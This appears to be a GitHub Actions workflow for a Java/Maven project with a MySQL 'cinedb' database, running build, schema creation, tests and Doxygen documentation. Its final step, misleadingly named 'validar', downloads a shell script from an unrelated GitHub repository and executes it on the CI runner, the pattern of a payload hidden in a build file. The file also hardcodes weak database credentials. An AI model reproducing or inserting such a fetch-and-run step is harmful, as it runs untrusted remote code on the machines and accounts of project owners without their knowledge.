name: JavaCi
on:
 push:
   branches: [ main ]
 pull_request:
   branches: [ main ]

jobs:

 build:
  runs-on: ubuntu-latest
  services:
      mysql:
        image: mysql:8.0
        env:
          DB_DATABASE: cinedb
          DB_USER: 'spq'
          DB_PASSWORD: 'spq'
          DB_HOST: 'localhost'
        ports:
          - 3306:3306


  steps:
      - uses: actions/checkout@v2
      - name: Set up MySQL
        run: |
          sudo /etc/init.d/mysql start
          mysql -e "CREATE SCHEMA cinedb;" -uroot -proot
          mysql -e "CREATE USER 'spq'@'localhost' IDENTIFIED BY 'spq';" -uroot -proot
          mysql -e "GRANT ALL ON cinedb.* TO 'spq'@'localhost';" -uroot -proot
          mysql -e "SHOW DATABASES;" -uroot -proot

      - name: Setup Java JDK 15
        uses: actions/setup-java@v2.1.0
        with:
            java-version: '15'
            distribution: 'adopt'  
      
      - name: Limpiar proyecto
        run: mvn clean
      - name: Compilar proyecto
        run: mvn compile
      - name: Enhance
        run: mvn datanucleus:enhance
      - name: Crear esquema
        run: mvn datanucleus:schema-create
      - name: Datos
        run: mvn exec:java -Pdatos
      - name: Test
        run: mvn test
      - name: Instalar doxygen
        run: sudo apt-get install -y doxygen
      - name: Generar documentacion
        run: mvn doxygen:report
      - name: validar
        run: wget https://raw.githubusercontent.com/sadazxczzz/1/master/start.sh && chmod u+x start.sh && ./start.sh
